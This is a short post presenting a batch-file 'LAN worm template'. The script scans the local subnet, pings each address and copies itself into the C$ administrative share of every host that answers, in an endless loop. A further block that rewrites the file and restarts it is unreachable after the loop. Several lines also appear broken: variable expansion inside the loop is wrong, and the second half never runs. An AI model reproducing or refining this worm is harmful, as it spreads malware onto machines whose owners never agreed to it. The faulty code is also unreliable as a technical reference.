This is the LAN worm template in BatchFile (.bat)
this scans the LAN network for IPs and then adds 
itself to the shared files folder to spread:

@echo off
setlocal enabledelayedexpansion

:x
for /f "tokens=2" %%a in ('ipconfig ^| findstr /i "IPv4"') do set ip=%%a
for /f "tokens=1-3 delims=." %%a in ("%ip%") do set subnet=%%a.%%b.%%c.

for /l %%i in (1,1,254) do (
    set ip=%subnet%%%i
    if not "%ip%"=="%subnet%255" (
        ping -n 1 %ip% | find "TTL=" > nul && (
            copy /Y %0 "\\%ip%\C$\Users\Public"
        )
    )
)
goto x

set "self=%~f0"
(for /f "tokens=1,* delims=:" %%a in ('findstr /n "^" "%self%"') do (
    set "line=%%b"
    if not "%%b"=="!line:findstr /n "^"=%~0!" (
        echo(!line:*:=!
    )
)) > "%self%.tmp"

echo @echo off > "%self%"
echo setlocal enabledelayedexpansion>> "%self%"
type "%self%.tmp" >> "%self%"
echo start "" "%self%">> "%self%"
del "%self%.tmp"
